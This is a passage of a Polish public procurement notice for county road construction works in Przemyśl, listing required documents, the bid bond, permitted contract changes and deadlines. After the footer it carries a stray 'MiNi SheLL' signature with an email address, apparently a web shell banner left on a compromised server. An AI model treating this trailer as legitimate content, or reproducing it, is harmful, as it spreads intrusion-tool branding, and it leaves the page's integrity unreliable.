osobami<br/>3) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne dokumenty<br/>PODMIOTYZAGRANICZNE:1)Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza<br/>terytoriumRzeczypospolitej Polskiej,zamiast dokumentu, o których mowa w ust. 1pkt 2 składa<br/>dokument lubdokumenty wystawione wkraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania,potwierdzające odpowiednio, żenie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>Dokument, októrym mowa powyżej, powinienbyć wystawiony nie wcześniej niż 3 miesięcy przed<br/>upływem terminuskładania ofert.2) Jeżeli w kraju,w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, niewydaje się dokumentów, o którychmowa w ust. 1 pkt 2, zastępuje się je w całości lub<br/>częścidokumentem zawierającym odpowiedniooświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osóbuprawnionych do jego reprezentacji,złożone przed notariuszem lub przed organem<br/>sądowym,administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze<br/>względu nasiedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> DOKUMENTYSKŁADANERAZEMZ OFERTĄ1. Oferta składana jest pod rygorem nieważności w formieelektronicznej lub<br/>wpostaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.2.Wykonawcadołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz<br/>spełnianiu warunkówudziału wpostępowaniu w zakresie wskazanym w SWZ. Oświadczenie to<br/>stanowi dowódpotwierdzającybrak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu, nadzieńskładania ofert, tymczasowo zastępujący wymagane podmiotowe środki<br/>dowodowe,wskazane w rozdziale II podrozdziale 8 pkt 2 SWZ.3. Oświadczenie składane jest<br/>pod rygorem nieważności wformie elektronicznej lub w postaci elektronicznej opatrzonej<br/>podpisem zaufanym,lub podpisemosobistym.WYKONAWCA JEST ZOBOWIĄZANY ZŁOŻYĆ<br/>TAKŻE WRAZ ZOFERTĄ: 1)OŚWIADZCENIE podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstawwykluczenia tegopodmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu; (jeżeli dotyczy)2)OŚWIADCZENIE wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia z którego wynika, które roboty budowlane lub dostawy<br/>lub usługi wykonają poszczególni wykonawcy ( jeżeli dotyczy)OŚWIADCZENIE potwierdzające<br/>brak podstaw wykluczenia podwykonawcy, na których zasobach wykonawca nie polega przy<br/>wykazywaniu spełnienia warunków udziału w postępowaniu (jeżeli dotyczy)DO OFERTY<br/>WYKONAWCAZAŁĄCZA RÓWNIEŻ: 1) ZOBOWIĄZANIE podmiotu udostępniającego zasoby (<br/>jeżeli dotyczy)2)dokumenty, z których wynika prawo do podpisania oferty;odpowiednie<br/>pełnomocnictwa (jeżelidotyczy);3) WYKAZ ROZWIĄZAŃ RÓWNOWAŻNYCH wykonawca<br/>załącza do oferty wykaz rozwiązań równoważnych z jego opisem lub normami (jeżeli dotyczy) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1)	Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: <br/>14.500,00 zł (słownie: czternaście tysięcy pięćset 00/100 złotych)<br/>2)	Wadium musi obejmować pełen okres związania ofertą tj. do dnia 29.07.2021 r.<br/>3)	Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/>4)	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego numer rachunku 21 1020 4391 0000 6602 0201 7754 Wadium musi wpłynąć na wskazany rachunek bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy zamawiającego).<br/>5)	Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/>-	nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Zarząd Dróg Powiatowych w Przemyślu<br/>-	określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>-	kwotę gwarancji/poręczenia,<br/>-	termin ważności gwarancji/poręczenia,<br/>-	zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>6)	W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>7)	Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>8)	Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> c)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia zgodnie <br/>z art. 58 ustawy Pzp. W przypadku Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia publicznego: <br/>•	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika <br/>do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>•	Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie <br/>z pełnomocnikiem.<br/>•	jeżeli oferta Wykonawców, o których mowa w pkt c, zostanie wybrana, zamawiający zastrzega możliwość żądania przed zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy regulującej współpracę tych Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.przesunięcia terminu wykonania przedmiotu umowy :1.1.z uwagi na<br/>niekorzystnewarunkiatmosferyczne uniemożliwiające wykonywanie prac (na okolicznośćwystąpieniawymienionegofaktu Wykonawca sporządzi notatkę służbową, która wymaga<br/>potwierdzeniaprzez InspektoraNadzoru i zwróci się do zamawiającego z pisemnym wnioskiem o<br/>przesuniecieterminuwykonania przedmiotu umowy podając przyczynę i proponowany termin<br/>zakończeniaprac, którynie może być dłuższy od faktycznego okresu przerwy lub postoju)2.<br/>przypadkuzaistnieniaokoliczności niezależnych od Wykonawcy, w szczególności z powodu:a)<br/>istnieniabraków wdokumentacji o czas niezbędny na ich uzupełnienie, b) konieczności<br/>wykonywaniaczęści robótw inny sposób niż założony w projekcie. Wynagrodzenie dla robót<br/>zamiennychzostanieokreślone na podstawie stawek i cen jednostkowych podanych w oparciu o<br/>bieżącąwycenę tychrobót, c) opóźnienia dostępu do placu budowy,d) w przypadku<br/>koniecznościwykonania robótdodatkowych albo innych robót, które są niezbędne do<br/>dokończenia realizacjiprzedmiotowegozamówienia,e) wstrzymania robót przez organy<br/>administracji publicznej,f)działania siły wyższej(np. klęski żywiołowe, strajki lokalne lub<br/>generalne) mające bezpośredniwpływ na terminowośćwykonywanych robót),g) zawieszenia<br/>robót przez Zamawiającego .3.rezygnacji z części pracy -w razie zaistnienia okoliczności, w<br/>których zbędne będzie wykonaniedanej części zamówienia,wraz ze związanym z tym<br/>obniżeniem wynagrodzenia (w takimprzypadku Wykonawcaprzygotuje przy udziale<br/>Zamawiającego protokół sporządzony na dzieńrezygnacji, w którymStrony określą prace, z<br/>wykonania których Zamawiający zrezygnował orazwysokość kwoty, októrą zostanie obniżone<br/>wynagrodzenie),4. konieczności wykonania robótzamiennych robotyzamienne będą mogły<br/>wystąpić wówczas, gdy część robót opisanych wdokumentacji nie będziewykonywana zaś strony<br/>uzgodnią w tym samym zakresie wartościowymwykonanie innych,koniecznych robót.5. zmiany<br/>sposobu realizacji zamówienia - wynikającej zezmian wobowiązujących przepisach prawa bądź<br/>wytycznych mających wpływ na realizacjęprzedmiotuumowy,6. konieczności wykonywania robót<br/>nieprzewidzianych i niewycenionych wofercie,7.zmiana osób wskazanych w umowie pełniących<br/>kontrolę i nadzór nadrealizowanymzamówieniema) zmiany kierownika budowyb) zmiany<br/>inspektoranadzoruZamawiający z własnejinicjatywy proponuje zmianę inspektora nadzoru w<br/>następującychprzypadkach :- śmierci,choroby lub innych zdarzeń losowych inspektora nadzoru,-<br/>niewywiązywania się przezinspektora nadzoru z obowiązków wynikających z umowy,-<br/>konieczności zmiany z innychprzyczyn niezależnych od Zamawiającego-np. rezygnacja,<br/>itp.Wykonawca może żądać odZamawiającego dokonania zmiany inspektora nadzoru<br/>wskazanegow umowie, jeżeli uzna, żeinspektor nadzoru nie wykonuje obowiązków<br/>wynikających z umowy.W przypadku dokonaniaw/w zmian - nowy inspektor nadzoru musi<br/>spełniać wymaganiaokreślone w SpecyfikacjiIstotnych Warunków Zamówienia. 8.innych<br/>istotnych postanowieńumowy - gdy ich zmiana jestkonieczna w związku ze zmianą przepisów<br/>prawa powszechnieobowiązującego w zakresiemającym wpływ na realizacje przedmiotu<br/>zamówienia , w tymrównież zmiany stawki podatkuVAT9.wartości zamówienia – łączna wartość<br/>zmian jest mniejsza niż progi unijne oraz jestniższa niż 15 % wartości pierwotnej umowy , a<br/>zmiany te nie powodujązmiany ogólnegocharakteru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-30 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zp.powiat.przemysl.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-30 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-29</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com